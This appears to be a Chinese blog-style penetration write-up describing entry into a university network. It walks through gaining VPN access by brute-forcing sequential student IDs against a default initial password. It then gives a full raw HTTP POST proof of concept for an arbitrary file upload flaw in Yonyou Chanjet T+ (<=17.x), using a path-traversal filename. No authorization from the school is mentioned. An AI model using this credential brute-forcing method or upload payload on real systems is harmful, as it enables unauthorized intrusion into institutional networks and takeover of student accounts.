远程渗透：利用VPN和漏洞深入校园网络

No.0前言

在当今企业环境中，远程工作已成为一种常态，VPN技术提供了一种安全便捷的方式，让员工能够从世界任何角落访问公司的内部网络。然而，正如VPN为合法用户打开了远程工作的大门，它也可能为网络安全防线引入了新的漏洞。一旦VPN配置不当或存在其他安全漏洞，黑客就能利用这一点进入局域网（LAN），接着进行深入的渗透测试。

No.1入口点查找

首先通过信息收集获得该校的VPN账号、密码和软件。以下是校园网的接入指南，发现存在初始密码。

阅读完毕后，在下方找到VPN的下载链接，进一步收集VPN的相关信息。

发现是通过校园网账号登录的。由于大多数高校学号固定且连续，尝试使用固定密码爆破学号以获取VPN账号（注：或许可直接通过校园墙进行一次攻击）

成功接入VPN。

No.2漏洞查找

继续收集资产，点击进入发现是用友畅捷通的系统。利用之前曝光的漏洞（用友畅捷通T+ <= 17.x），发现存在任意文件上传的漏洞，投放POC进行尝试。

POC：

POST /tplus/SM/SetupAccount/Upload.aspx?preload=1 HTTP/1.1


Host: http://xxxxx


User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36


Content-Length: 188


Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, / ;q=0.8,application/signed-exchange;v=b3;q=0.9


Accept-Encoding: gzip, deflate


Accept-Language: zh-CN,zh;q=0.9


Cache-Control: max-age=0


Connection: close


Content-Type: multipart/form-data; boundary=----WebKitFormBoundarysHT4cEvOAWALSZEv


Origin: null


Upgrade-Insecure-Requests: 1


------WebKitFormBoundarysHT4cEvOAWALSZEv


Content-Disposition: form-data; name="File1"; filename="../aaaa.txt"


Content-Type: image/jpeg


aaaa


------WebKitFormBoundarysHT4cEvOAWALSZEv--

查看返回包发现成功上传。

直接访问上传的文件

至此高危漏洞成功利用。